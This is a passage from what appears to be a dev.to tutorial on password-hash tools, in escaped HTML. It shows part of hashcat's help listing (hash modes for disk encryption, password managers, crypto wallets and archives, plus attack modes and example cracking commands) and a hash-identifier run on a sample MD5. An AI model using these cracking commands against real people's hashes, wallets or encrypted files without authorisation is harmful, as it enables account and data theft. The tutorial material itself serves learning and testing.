  13773 | VeraCrypt Streebog-512 + XTS 1536 bit            | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13731 | VeraCrypt Whirlpool + XTS 512 bit                | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13732 | VeraCrypt Whirlpool + XTS 1024 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  13733 | VeraCrypt Whirlpool + XTS 1536 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  16700 | FileVault 2                                      | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  20011 | DiskCryptor SHA512 + XTS 512 bit                 | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  20012 | DiskCryptor SHA512 + XTS 1024 bit                | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  20013 | DiskCryptor SHA512 + XTS 1536 bit                | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  22100 | BitLocker                                        | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  12900 | Android FDE &lt;span class="o"&gt;(&lt;/span&gt;Samsung DEK&lt;span class="o"&gt;)&lt;/span&gt;                        | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   8800 | Android FDE &amp;lt;&lt;span class="o"&gt;=&lt;/span&gt; 4.3                               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  18300 | Apple File System &lt;span class="o"&gt;(&lt;/span&gt;APFS&lt;span class="o"&gt;)&lt;/span&gt;                         | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6211 | TrueCrypt RIPEMD160 + XTS 512 bit                | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6212 | TrueCrypt RIPEMD160 + XTS 1024 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6213 | TrueCrypt RIPEMD160 + XTS 1536 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode    | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode   | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode   | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6221 | TrueCrypt SHA512 + XTS 512 bit                   | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6222 | TrueCrypt SHA512 + XTS 1024 bit                  | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6223 | TrueCrypt SHA512 + XTS 1536 bit                  | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6231 | TrueCrypt Whirlpool + XTS 512 bit                | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6232 | TrueCrypt Whirlpool + XTS 1024 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
   6233 | TrueCrypt Whirlpool + XTS 1536 bit               | Full-Disk Encryption &lt;span class="o"&gt;(&lt;/span&gt;FDE&lt;span class="o"&gt;)&lt;/span&gt;
  10400 | PDF 1.1 - 1.3 &lt;span class="o"&gt;(&lt;/span&gt;Acrobat 2 - 4&lt;span class="o"&gt;)&lt;/span&gt;                    | Documents
  10410 | PDF 1.1 - 1.3 &lt;span class="o"&gt;(&lt;/span&gt;Acrobat 2 - 4&lt;span class="o"&gt;)&lt;/span&gt;, collider &lt;span class="c"&gt;#1       | Documents&lt;/span&gt;
  10420 | PDF 1.1 - 1.3 &lt;span class="o"&gt;(&lt;/span&gt;Acrobat 2 - 4&lt;span class="o"&gt;)&lt;/span&gt;, collider &lt;span class="c"&gt;#2       | Documents&lt;/span&gt;
  10500 | PDF 1.4 - 1.6 &lt;span class="o"&gt;(&lt;/span&gt;Acrobat 5 - 8&lt;span class="o"&gt;)&lt;/span&gt;                    | Documents
  10600 | PDF 1.7 Level 3 &lt;span class="o"&gt;(&lt;/span&gt;Acrobat 9&lt;span class="o"&gt;)&lt;/span&gt;                      | Documents
  10700 | PDF 1.7 Level 8 &lt;span class="o"&gt;(&lt;/span&gt;Acrobat 10 - 11&lt;span class="o"&gt;)&lt;/span&gt;                | Documents
   9400 | MS Office 2007                                   | Documents
   9500 | MS Office 2010                                   | Documents
   9600 | MS Office 2013                                   | Documents
   9700 | MS Office &amp;lt;&lt;span class="o"&gt;=&lt;/span&gt; 2003 &lt;span class="nv"&gt;$0&lt;/span&gt;/&lt;span class="nv"&gt;$1&lt;/span&gt;, MD5 + RC4               | Documents
   9710 | MS Office &amp;lt;&lt;span class="o"&gt;=&lt;/span&gt; 2003 &lt;span class="nv"&gt;$0&lt;/span&gt;/&lt;span class="nv"&gt;$1&lt;/span&gt;, MD5 + RC4, collider &lt;span class="c"&gt;#1  | Documents&lt;/span&gt;
   9720 | MS Office &amp;lt;&lt;span class="o"&gt;=&lt;/span&gt; 2003 &lt;span class="nv"&gt;$0&lt;/span&gt;/&lt;span class="nv"&gt;$1&lt;/span&gt;, MD5 + RC4, collider &lt;span class="c"&gt;#2  | Documents&lt;/span&gt;
   9800 | MS Office &amp;lt;&lt;span class="o"&gt;=&lt;/span&gt; 2003 &lt;span class="nv"&gt;$3&lt;/span&gt;/&lt;span class="nv"&gt;$4&lt;/span&gt;, SHA1 + RC4              | Documents
   9810 | MS Office &amp;lt;&lt;span class="o"&gt;=&lt;/span&gt; 2003 &lt;span class="nv"&gt;$3&lt;/span&gt;, SHA1 + RC4, collider &lt;span class="c"&gt;#1    | Documents&lt;/span&gt;
   9820 | MS Office &amp;lt;&lt;span class="o"&gt;=&lt;/span&gt; 2003 &lt;span class="nv"&gt;$3&lt;/span&gt;, SHA1 + RC4, collider &lt;span class="c"&gt;#2    | Documents&lt;/span&gt;
  18400 | Open Document Format &lt;span class="o"&gt;(&lt;/span&gt;ODF&lt;span class="o"&gt;)&lt;/span&gt; 1.2 &lt;span class="o"&gt;(&lt;/span&gt;SHA-256, AES&lt;span class="o"&gt;)&lt;/span&gt;    | Documents
  18600 | Open Document Format &lt;span class="o"&gt;(&lt;/span&gt;ODF&lt;span class="o"&gt;)&lt;/span&gt; 1.1 &lt;span class="o"&gt;(&lt;/span&gt;SHA-1, Blowfish&lt;span class="o"&gt;)&lt;/span&gt; | Documents
  16200 | Apple Secure Notes                               | Documents
  15500 | JKS Java Key Store Private Keys &lt;span class="o"&gt;(&lt;/span&gt;SHA1&lt;span class="o"&gt;)&lt;/span&gt;           | Password Managers
   6600 | 1Password, agilekeychain                         | Password Managers
   8200 | 1Password, cloudkeychain                         | Password Managers
   9000 | Password Safe v2                                 | Password Managers
   5200 | Password Safe v3                                 | Password Managers
   6800 | LastPass + LastPass sniffed                      | Password Managers
  13400 | KeePass 1 &lt;span class="o"&gt;(&lt;/span&gt;AES/Twofish&lt;span class="o"&gt;)&lt;/span&gt; and KeePass 2 &lt;span class="o"&gt;(&lt;/span&gt;AES&lt;span class="o"&gt;)&lt;/span&gt;      | Password Managers
  11300 | Bitcoin/Litecoin wallet.dat                      | Password Managers
  16600 | Electrum Wallet &lt;span class="o"&gt;(&lt;/span&gt;Salt-Type 1-3&lt;span class="o"&gt;)&lt;/span&gt;                  | Password Managers
  21700 | Electrum Wallet &lt;span class="o"&gt;(&lt;/span&gt;Salt-Type 4&lt;span class="o"&gt;)&lt;/span&gt;                    | Password Managers
  21800 | Electrum Wallet &lt;span class="o"&gt;(&lt;/span&gt;Salt-Type 5&lt;span class="o"&gt;)&lt;/span&gt;                    | Password Managers
  12700 | Blockchain, My Wallet                            | Password Managers
  15200 | Blockchain, My Wallet, V2                        | Password Managers
  18800 | Blockchain, My Wallet, Second Password &lt;span class="o"&gt;(&lt;/span&gt;SHA256&lt;span class="o"&gt;)&lt;/span&gt;  | Password Managers
  23100 | Apple Keychain                                   | Password Managers
  16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256     | Password Managers
  15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256              | Password Managers
  15700 | Ethereum Wallet, SCRYPT                          | Password Managers
  22500 | MultiBit Classic .key &lt;span class="o"&gt;(&lt;/span&gt;MD5&lt;span class="o"&gt;)&lt;/span&gt;                      | Password Managers
  22700 | MultiBit HD &lt;span class="o"&gt;(&lt;/span&gt;scrypt&lt;span class="o"&gt;)&lt;/span&gt;                             | Password Managers
  11600 | 7-Zip                                            | Archives
  12500 | RAR3-hp                                          | Archives
  13000 | RAR5                                             | Archives
  17200 | PKZIP &lt;span class="o"&gt;(&lt;/span&gt;Compressed&lt;span class="o"&gt;)&lt;/span&gt;                               | Archives
  17220 | PKZIP &lt;span class="o"&gt;(&lt;/span&gt;Compressed Multi-File&lt;span class="o"&gt;)&lt;/span&gt;                    | Archives
  17225 | PKZIP &lt;span class="o"&gt;(&lt;/span&gt;Mixed Multi-File&lt;span class="o"&gt;)&lt;/span&gt;                         | Archives
  17230 | PKZIP &lt;span class="o"&gt;(&lt;/span&gt;Mixed Multi-File Checksum-Only&lt;span class="o"&gt;)&lt;/span&gt;           | Archives
  17210 | PKZIP &lt;span class="o"&gt;(&lt;/span&gt;Uncompressed&lt;span class="o"&gt;)&lt;/span&gt;                             | Archives
  20500 | PKZIP Master Key                                 | Archives
  20510 | PKZIP Master Key &lt;span class="o"&gt;(&lt;/span&gt;6 byte optimization&lt;span class="o"&gt;)&lt;/span&gt;           | Archives
  14700 | iTunes backup &amp;lt; 10.0                             | Archives
  14800 | iTunes backup &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; 10.0                            | Archives
  23001 | SecureZIP AES-128                                | Archives
  23002 | SecureZIP AES-192                                | Archives
  23003 | SecureZIP AES-256                                | Archives
  13600 | WinZip                                           | Archives
  18900 | Android Backup                                   | Archives
  13200 | AxCrypt                                          | Archives
  13300 | AxCrypt &lt;span class="k"&gt;in&lt;/span&gt;&lt;span class="nt"&gt;-memory&lt;/span&gt; SHA1                           | Archives
   8400 | WBB3 &lt;span class="o"&gt;(&lt;/span&gt;Woltlab Burning Board&lt;span class="o"&gt;)&lt;/span&gt;                     | Forums, CMS, E-Commerce
   2611 | vBulletin &amp;lt; v3.8.5                               | Forums, CMS, E-Commerce
   2711 | vBulletin &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; v3.8.5                              | Forums, CMS, E-Commerce
   2612 | PHPS                                             | Forums, CMS, E-Commerce
    121 | SMF &lt;span class="o"&gt;(&lt;/span&gt;Simple Machines Forum&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; v1.1               | Forums, CMS, E-Commerce
   3711 | MediaWiki B &lt;span class="nb"&gt;type&lt;/span&gt;                                 | Forums, CMS, E-Commerce
   4521 | Redmine                                          | Forums, CMS, E-Commerce
     11 | Joomla &amp;lt; 2.5.18                                  | Forums, CMS, E-Commerce
  13900 | OpenCart                                         | Forums, CMS, E-Commerce
  11000 | PrestaShop                                       | Forums, CMS, E-Commerce
  16000 | Tripcode                                         | Forums, CMS, E-Commerce
   7900 | Drupal7                                          | Forums, CMS, E-Commerce
     21 | osCommerce, xt:Commerce                          | Forums, CMS, E-Commerce
   4522 | PunBB                                            | Forums, CMS, E-Commerce
   2811 | MyBB 1.2+, IPB2+ &lt;span class="o"&gt;(&lt;/span&gt;Invision Power Board&lt;span class="o"&gt;)&lt;/span&gt;          | Forums, CMS, E-Commerce
  18100 | TOTP &lt;span class="o"&gt;(&lt;/span&gt;HMAC-SHA1&lt;span class="o"&gt;)&lt;/span&gt;                                 | One-Time Passwords
   2000 | STDOUT                                           | Plaintext
  99999 | Plaintext                                        | Plaintext
  21600 | Web2py pbkdf2-sha512                             | Framework
  10000 | Django &lt;span class="o"&gt;(&lt;/span&gt;PBKDF2-SHA256&lt;span class="o"&gt;)&lt;/span&gt;                           | Framework
    124 | Django &lt;span class="o"&gt;(&lt;/span&gt;SHA-1&lt;span class="o"&gt;)&lt;/span&gt;                                   | Framework

- &lt;span class="o"&gt;[&lt;/span&gt; Brain Client Features &lt;span class="o"&gt;]&lt;/span&gt; -

  &lt;span class="c"&gt;# | Features&lt;/span&gt;
 &lt;span class="o"&gt;===&lt;/span&gt;+&lt;span class="o"&gt;========&lt;/span&gt;
  1 | Send hashed passwords
  2 | Send attack positions
  3 | Send hashed passwords and attack positions

- &lt;span class="o"&gt;[&lt;/span&gt; Outfile Formats &lt;span class="o"&gt;]&lt;/span&gt; -

  &lt;span class="c"&gt;# | Format&lt;/span&gt;
 &lt;span class="o"&gt;===&lt;/span&gt;+&lt;span class="o"&gt;========&lt;/span&gt;
  1 | &lt;span class="nb"&gt;hash&lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;:salt]
  2 | plain
  3 | hex_plain
  4 | crack_pos
  5 | timestamp absolute
  6 | timestamp relative

- &lt;span class="o"&gt;[&lt;/span&gt; Rule Debugging Modes &lt;span class="o"&gt;]&lt;/span&gt; -

  &lt;span class="c"&gt;# | Format&lt;/span&gt;
 &lt;span class="o"&gt;===&lt;/span&gt;+&lt;span class="o"&gt;========&lt;/span&gt;
  1 | Finding-Rule
  2 | Original-Word
  3 | Original-Word:Finding-Rule
  4 | Original-Word:Finding-Rule:Processed-Word

- &lt;span class="o"&gt;[&lt;/span&gt; Attack Modes &lt;span class="o"&gt;]&lt;/span&gt; -

  &lt;span class="c"&gt;# | Mode&lt;/span&gt;
 &lt;span class="o"&gt;===&lt;/span&gt;+&lt;span class="o"&gt;======&lt;/span&gt;
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist

- &lt;span class="o"&gt;[&lt;/span&gt; Built-in Charsets &lt;span class="o"&gt;]&lt;/span&gt; -

  ? | Charset
 &lt;span class="o"&gt;===&lt;/span&gt;+&lt;span class="o"&gt;=========&lt;/span&gt;
  l | abcdefghijklmnopqrstuvwxyz
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
  d | 0123456789
  h | 0123456789abcdef
  H | 0123456789ABCDEF
  s |  &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="s2"&gt;"#&lt;/span&gt;&lt;span class="nv"&gt;$%&lt;/span&gt;&lt;span class="s2"&gt;&amp;amp;'()*+,-./:;&amp;lt;=&amp;gt;?@[&lt;/span&gt;&lt;span class="se"&gt;\]&lt;/span&gt;&lt;span class="s2"&gt;^_&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="o"&gt;{&lt;/span&gt;|&lt;span class="o"&gt;}&lt;/span&gt;~
  a | ?l?u?d?s
  b | 0x00 - 0xff

- &lt;span class="o"&gt;[&lt;/span&gt; OpenCL Device Types &lt;span class="o"&gt;]&lt;/span&gt; -

  &lt;span class="c"&gt;# | Device Type&lt;/span&gt;
 &lt;span class="o"&gt;===&lt;/span&gt;+&lt;span class="o"&gt;=============&lt;/span&gt;
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor

- &lt;span class="o"&gt;[&lt;/span&gt; Workload Profiles &lt;span class="o"&gt;]&lt;/span&gt; -

  &lt;span class="c"&gt;# | Performance | Runtime | Power Consumption | Desktop Impact&lt;/span&gt;
 &lt;span class="o"&gt;===&lt;/span&gt;+&lt;span class="o"&gt;=============&lt;/span&gt;+&lt;span class="o"&gt;=========&lt;/span&gt;+&lt;span class="o"&gt;===================&lt;/span&gt;+&lt;span class="o"&gt;=================&lt;/span&gt;
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless

- &lt;span class="o"&gt;[&lt;/span&gt; Basic Examples &lt;span class="o"&gt;]&lt;/span&gt; -

  Attack-          | Hash- |
  Mode             | Type  | Example &lt;span class="nb"&gt;command&lt;/span&gt;
 &lt;span class="o"&gt;==================&lt;/span&gt;+&lt;span class="o"&gt;=======&lt;/span&gt;+&lt;span class="o"&gt;==================================================================&lt;/span&gt;
  Wordlist         | &lt;span class="nv"&gt;$P$ &lt;/span&gt;  | hashcat &lt;span class="nt"&gt;-a&lt;/span&gt; 0 &lt;span class="nt"&gt;-m&lt;/span&gt; 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat &lt;span class="nt"&gt;-a&lt;/span&gt; 0 &lt;span class="nt"&gt;-m&lt;/span&gt; 0 example0.hash example.dict &lt;span class="nt"&gt;-r&lt;/span&gt; rules/best64.rule
  Brute-Force      | MD5   | hashcat &lt;span class="nt"&gt;-a&lt;/span&gt; 3 &lt;span class="nt"&gt;-m&lt;/span&gt; 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat &lt;span class="nt"&gt;-a&lt;/span&gt; 1 &lt;span class="nt"&gt;-m&lt;/span&gt; 0 example0.hash example.dict example.dict

If you still have no idea what just happened, try the following pages:

&lt;span class="k"&gt;*&lt;/span&gt; https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
&lt;span class="k"&gt;*&lt;/span&gt; https://hashcat.net/faq/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h1&gt;
  
  
  let's go to use Hash-identifier
&lt;/h1&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hash-identifier
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;   &lt;span class="c"&gt;#########################################################################&lt;/span&gt;
   &lt;span class="c"&gt;#     __  __                     __           ______    _____           #&lt;/span&gt;
   &lt;span class="c"&gt;#    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #&lt;/span&gt;
   &lt;span class="c"&gt;#    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #&lt;/span&gt;
   &lt;span class="c"&gt;#     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #&lt;/span&gt;
   &lt;span class="c"&gt;#      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #&lt;/span&gt;
   &lt;span class="c"&gt;#       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #&lt;/span&gt;
   &lt;span class="c"&gt;#        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #&lt;/span&gt;
   &lt;span class="c"&gt;#                                                             By Zion3R #&lt;/span&gt;
   &lt;span class="c"&gt;#                                                    www.Blackploit.com #&lt;/span&gt;
   &lt;span class="c"&gt;#                                                   Root@Blackploit.com #&lt;/span&gt;
   &lt;span class="c"&gt;#########################################################################&lt;/span&gt;
&lt;span class="nt"&gt;--------------------------------------------------&lt;/span&gt;
 HASH: 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;let's generate a hash on the MD5 site and paste it into the hash-identifier terminal&lt;br&gt;
&lt;b&gt;&lt;a href="https://www.md5hashgenerator.com/" rel="noopener noreferrer"&gt;https://www.md5hashgenerator.com/&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zev16mwaskdx72c7id2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zev16mwaskdx72c7id2.png" alt=" " width="631" height="498"&gt;&lt;/a&gt;&lt;br&gt;
Msg : bonjour samuel&lt;br&gt;
MD5: 3615cdf80ebacda55dd2aa30dc4bebd0&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;   &lt;span class="c"&gt;#########################################################################&lt;/span&gt;
   &lt;span class="c"&gt;#     __  __                     __           ______    _____           #&lt;/span&gt;
   &lt;span class="c"&gt;#    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #&lt;/span&gt;
   &lt;span class="c"&gt;#    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #&lt;/span&gt;
   &lt;span class="c"&gt;#     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #&lt;/span&gt;
   &lt;span class="c"&gt;#      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #&lt;/span&gt;
   &lt;span class="c"&gt;#       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #&lt;/span&gt;
   &lt;span class="c"&gt;#        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #&lt;/span&gt;
   &lt;span class="c"&gt;#                                                             By Zion3R #&lt;/span&gt;
   &lt;span class="c"&gt;#                                                    www.Blackploit.com #&lt;/span&gt;
   &lt;span class="c"&gt;#                                                   Root@Blackploit.com #&lt;/span&gt;
   &lt;span class="c"&gt;#########################################################################&lt;/span&gt;
&lt;span class="nt"&gt;--------------------------------------------------&lt;/span&gt;
 HASH: 3615cdf80ebacda55dd2aa30dc4bebd0

Possible Hashs:
&lt;span class="o"&gt;[&lt;/span&gt;+] MD5
&lt;span class="o"&gt;[&lt;/span&gt;+] Domain Cached Credentials - MD4&lt;span class="o"&gt;(&lt;/span&gt;MD4&lt;span class="o"&gt;((&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;.&lt;span class="o"&gt;(&lt;/span&gt;strtolower&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="o"&gt;)))&lt;/span&gt;

Least Possible Hashs:
&lt;span class="o"&gt;[&lt;/span&gt;+] RAdmin v2.x
&lt;span class="o"&gt;[&lt;/span&gt;+] NTLM
&lt;span class="o"&gt;[&lt;/span&gt;+] MD4
&lt;span class="o"&gt;[&lt;/span&gt;+] MD2
&lt;span class="o"&gt;[&lt;/span&gt;+] MD5&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] MD4&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] MD2&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] MD5&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;(&lt;/span&gt;Wordpress&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] Haval-128
&lt;span class="o"&gt;[&lt;/span&gt;+] Haval-128&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] RipeMD-128
&lt;span class="o"&gt;[&lt;/span&gt;+] RipeMD-128&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] SNEFRU-128
&lt;span class="o"&gt;[&lt;/span&gt;+] SNEFRU-128&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] Tiger-128
&lt;span class="o"&gt;[&lt;/span&gt;+] Tiger-128&lt;span class="o"&gt;(&lt;/span&gt;HMAC&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;.0.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;.LF.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
